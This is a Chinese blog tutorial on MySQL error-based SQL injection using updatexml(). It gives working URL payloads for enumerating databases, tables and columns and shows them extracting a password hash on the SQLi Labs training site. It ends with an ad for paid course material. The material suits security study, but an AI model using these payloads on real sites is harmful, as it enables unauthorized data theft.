Web安全:报错注入原理分析,报错注入步骤,报错注入常用函数

文章讲述了如何在网页中利用报错注入技术,通过动态插入SQL查询并在MySQL的updatexml函数报错中获取数据,同时介绍了limit分页和substr截取字符来处理长度限制。作者还给出了实际案例和常见报错函数,强调了这种技术在网络安全中的应用和潜在风险。
摘要由CSDN通过智能技术生成

我们尝试在查询用户id的同时,使用报错函数,在地址栏输入:?id=1' and updatexml(1, 0x7e, 3) -- a

在这里插入图片描述

提示:0x7e 等价于 ~;updatexml() 需要MySQL5.1及以上版本。

参数2包含特殊符号 ~,触发数据库报错,并将参数2的内容显示在报错信息中。

3. 拼接查询结果

如果我们在参数2的位置,将查询语句和特殊符号拼接在一起,就可以将查询结果显示在报错信息中,在地址栏中输入:

?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a

在这里插入图片描述
参数2内容中的查询结果显示在数据库的报错信息中,并回显到页面。

提示:

  1. version():返回数据库版本
  2. concat():拼接特殊符号和查询结果,函数使用方式可以参考我的另一篇博客:MySQL concat函数使用详解

4. 长度限制

updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:

  1. limit 分页
  2. substr()截取字符
4.1 limit 分页

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
	(select user
	from mysql.user limit 1,1)
),3) -- a

在这里插入图片描述

4.2 substr()截取字符

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
	substr(
		(select group_concat(user)
		from mysql.user)
	, 1 , 31)
),3) -- a

在这里插入图片描述
理解报错注入的执行原理后,我们整理一下报错注入的步骤。

三、步骤总结

适用情况:页面有数据库的报错信息

报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。

1. 判断是否报错

参数中添加单/双引号,页面报错才可进行下一步。

?id=1' -- a

2. 判断报错条件

参数中添加报错函数,检查报错信息是否正常回显

?id=1' and updatexml(1,'~',3) -- a

3. 脱库

获取所有数据库

?id=-1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(schema_name)
		from information_schema.schemata)
	, 1 , 31)
),3) -- a

获取所有表

?id=1' and updatexml(1,concat('~',
 substr( 
 (select group\_concat(table\_name)
 from information\_schema.tables
 where table\_schema = 'security')
	, 1 , 31)
),3) -- a

获取所有字段

?id=1' and updatexml(1,concat('~',
 substr( 
 (select group\_concat(column\_name)
 from information\_schema.columns
 where table\_schema = 'security' and table\_name = 'users')
	, 1 , 31)
),3) -- a

四、实战案例

我们拿上面的测试网站(SQLi Labs 第一关)来举例,添加单引号查看是否报错,地址栏输入 ?id=1'
在这里插入图片描述
页面出现数据库的报错信息,适合使用报错注入,接下来,获取数据库用户的密码,地址栏输入:

?id=-1' and updatexml(1,concat('~',
 substr(
 (select password 
 from mysql.user where user='mituan') 
    , 1 , 31)
),3) -- a

报错信息中返回用户密码:
在这里插入图片描述

五、常见的报错函数

除了updatexml()外,还有其他的报错函数。

MySQL
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值